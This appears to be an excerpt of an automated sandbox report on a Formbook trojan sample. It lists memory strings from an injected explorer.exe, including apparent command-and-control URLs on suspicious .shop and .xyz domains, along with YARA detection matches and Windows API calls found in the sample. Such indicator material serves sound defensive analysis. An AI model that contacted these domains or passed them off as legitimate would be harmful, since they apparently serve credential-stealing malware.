Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rs-alohafactorysaleuua.shop
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rs-alohafactorysaleuua.shop/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rs-alohafactorysaleuua.shop/gy15/www.tqqft8l5.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rs-alohafactorysaleuua.shopReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tqqft8l5.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tqqft8l5.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tqqft8l5.xyz/gy15/www.jwoalhbn.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tqqft8l5.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ttyijlaw.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ttyijlaw.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ttyijlaw.com/gy15/www.incrediblyxb.christmas
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ttyijlaw.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vivehogar.net
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vivehogar.net/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vivehogar.net/gy15/www.insurancebygarry.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vivehogar.netReferer:
Source: explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000009.00000000.2160546176.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000009.00000000.2160546176.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comEMd
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000099AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Source: Yara match File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: RegSvcs.exe PID: 5224, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 3236, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\explorer.exe Code function: 9_2_0E396232 NtCreateFile, 9_2_0E396232
Source: C:\Windows\explorer.exe Code function: 9_2_0E397E12 NtProtectVirtualMemory, 9_2_0E397E12
Source: C:\Windows\explorer.exe Code function: 9_2_0E397E0A NtProtectVirtualMemory, 9_2_0E397E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041A370 NtCreateFile, 13_2_0041A370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041A420 NtReadFile, 13_2_0041A420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041A4A0 NtClose, 13_2_0041A4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041A550 NtAllocateVirtualMemory, 13_2_0041A550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041A41C NtReadFile, 13_2_0041A41C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041A49A NtClose, 13_2_0041A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282B60 NtClose,LdrInitializeThunk, 13_2_01282B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_01282BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282AD0 NtReadFile,LdrInitializeThunk, 13_2_01282AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282D30 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_01282D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282D10 NtMapViewOfSection,LdrInitializeThunk, 13_2_01282D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282DF0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_01282DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282DD0 NtDelayExecution,LdrInitializeThunk, 13_2_01282DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282C70 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_01282C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282CA0 NtQueryInformationToken,LdrInitializeThunk, 13_2_01282CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282F30 NtCreateSection,LdrInitializeThunk, 13_2_01282F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282FB0 NtResumeThread,LdrInitializeThunk, 13_2_01282FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282F90 NtProtectVirtualMemory,LdrInitializeThunk, 13_2_01282F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282FE0 NtCreateFile,LdrInitializeThunk, 13_2_01282FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 13_2_01282EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282E80 NtReadVirtualMemory,LdrInitializeThunk, 13_2_01282E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01284340 NtSetContextThread, 13_2_01284340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01284650 NtSuspendThread, 13_2_01284650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282BA0 NtEnumerateValueKey, 13_2_01282BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282B80 NtQueryInformationFile, 13_2_01282B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282BE0 NtQueryValueKey, 13_2_01282BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282AB0 NtWaitForSingleObject, 13_2_01282AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282AF0 NtWriteFile, 13_2_01282AF0
